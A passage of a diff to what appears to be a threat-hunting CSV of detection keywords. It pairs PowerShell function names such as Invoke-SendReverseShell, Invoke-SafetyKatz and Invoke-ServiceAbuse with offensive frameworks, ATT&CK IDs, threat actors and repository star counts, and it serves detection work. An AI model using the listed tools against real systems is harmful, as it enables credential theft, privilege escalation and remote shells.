FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/PowerView3-Aggressor","1","1","N/A","10","10","125","39","2018-07-24T21:52:03Z","2018-07-24T21:16:10Z"
 "*Invoke-RevShellServer.ps1*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - 
TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z"
-"*Invoke-Rubeus*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z"
-"*Invoke-Rubeus*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z"
+"*Invoke-Rubeus*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z"
+"*Invoke-Rubeus*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z"
 "*Invoke-RunAs.ps1*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - 
TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z"
 "*Invoke-RunasCs*","offensive_tool_keyword","RunasCs","RunasCs is an utility to run specific processes with different permissions than the user's current logon provides using explicit credential","T1055 - T1134.001","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs","1","1","N/A","N/A","8","722","107","2023-05-20T01:19:52Z","2019-08-08T20:18:18Z"
 "*Invoke-RunasCs*","offensive_tool_keyword","RunasCs","RunasCs - Csharp and open version of windows builtin runas.exe","T1059.003 - T1059.001 - T1035","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs/","1","1","N/A","6","8","722","107","2023-05-20T01:19:52Z","2019-08-08T20:18:18Z"
-"*invoke-runaspayload*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z"
-"*Invoke-RunningProcessCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2247","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z"
-"*Invoke-S3ssionGoph3r*","offensive_tool_keyword","WinPwn","Automation for internal Windows 
Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z"
+"*invoke-runaspayload*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z"
+"*Invoke-RunningProcessCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z"
+"*Invoke-S3ssionGoph3r*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z"
 "*Invoke-S4U-persistence.ps1*","offensive_tool_keyword","viperc2","vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1001 - T1021 - T1024 - T1033 - T1047 - 
T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/FunnyWolf/vipermsf","1","1","N/A","N/A","1","78","37","2023-09-28T08:36:47Z","2021-01-20T13:08:24Z"
-"*Invoke-SafetyKatz*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z"
+"*Invoke-SafetyKatz*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z"
 "*Invoke-SamBackupFilesCheck*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z"
-"*Invoke-SauronEye*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z"
-"*Invoke-SccmCacheFolderCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for 
Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2247","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z"
+"*Invoke-SauronEye*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z"
+"*Invoke-SccmCacheFolderCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z"
 "*Invoke-ScheduledTasksCheck*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z"
-"*Invoke-ScheduledTasksImagePermissionsCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2247","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z"
-"*Invoke-ScheduledTasksUnquotedPathCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege 
Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2247","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z"
-"*Invoke-SCMPermissionsCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2247","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z"
+"*Invoke-ScheduledTasksImagePermissionsCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z"
+"*Invoke-ScheduledTasksUnquotedPathCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z"
+"*Invoke-SCMPermissionsCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z"
 "*Invoke-ScriptSentry*","offensive_tool_keyword","ScriptSentry","ScriptSentry finds misconfigured and dangerous logon scripts.","T1037 - T1037.005 - T1046","TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/techspence/ScriptSentry","1","0","N/A","7","1","44","3","2023-08-16T19:32:24Z","2023-07-22T03:17:58Z"
-"*Invoke-SCShell*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation 
tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" -"*Invoke-SDCLTBypass*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1130","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-SCShell*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation 
tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-SDCLTBypass*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1130","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Invoke-SDPropagator*","offensive_tool_keyword","powershell","propagation of ACL changes on the 'AdminSDHolder' container. which can be used to maintain unauthorized access or escalate privileges in the targeted environment. 
The 'AdminSDHolder' container plays a crucial role in managing the security of protected groups in Active Directory. and forcing ACL changes to propagate may lead to unintended security consequences.","T1222","TA0003","N/A","N/A","Persistence","https://github.com/theyoge/AD-Pentesting-Tools/blob/main/Invoke-SDPropagator.ps1","1","1","N/A","N/A","1","57","10","2020-12-29T07:57:54Z","2020-10-14T05:01:51Z" -"*Invoke-Seatbelt*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" -"*Invoke-Seatbelt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Invoke-Seatbelt*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-Seatbelt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" "*Invoke-SendMail -Targets*","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of 
an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","N/A","C2","https://github.com/Arno0x/DBC2","1","0","N/A","10","10","269","85","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z" "*Invoke-SendReverseShell*","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","N/A","C2","https://github.com/Arno0x/DBC2","1","1","N/A","10","10","269","85","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z" -"*Invoke-SensitiveHiveFileAccessCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2247","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" -"*Invoke-SensitiveHiveShadowCopyCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2247","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Invoke-SensitiveHiveFileAccessCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Invoke-SensitiveHiveShadowCopyCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege 
Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" "*Invoke-ServiceAbuse*","offensive_tool_keyword","AD exploitation cheat sheet","Exploit vulnerable service permissions (does not require touching disk)","T1550 - T1555 - T1212 - T1558","N/A","N/A","N/A","Exploitation tools","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*Invoke-ServiceAbuse*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - 
Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","PowerUp.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Invoke-ServiceAbuse*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Invoke-ServiceAbuse*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","PowerUp.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-ServiceAbuse*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*Invoke-Service-persistence.ps1*","offensive_tool_keyword","viperc2","vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/FunnyWolf/vipermsf","1","1","N/A","N/A","1","78","37","2023-09-28T08:36:47Z","2021-01-20T13:08:24Z" "*Invoke-ServicesImagePermissionsCheck*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" -"*Invoke-ServicesImagePermissionsCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2247","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Invoke-ServicesImagePermissionsCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege 
Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" "*Invoke-ServicesPermissionsCheck*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" -"*Invoke-ServicesPermissionsCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2247","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Invoke-ServicesPermissionsCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" "*Invoke-ServicesPermissionsRegistryCheck*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" -"*Invoke-ServicesPermissionsRegistryCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege 
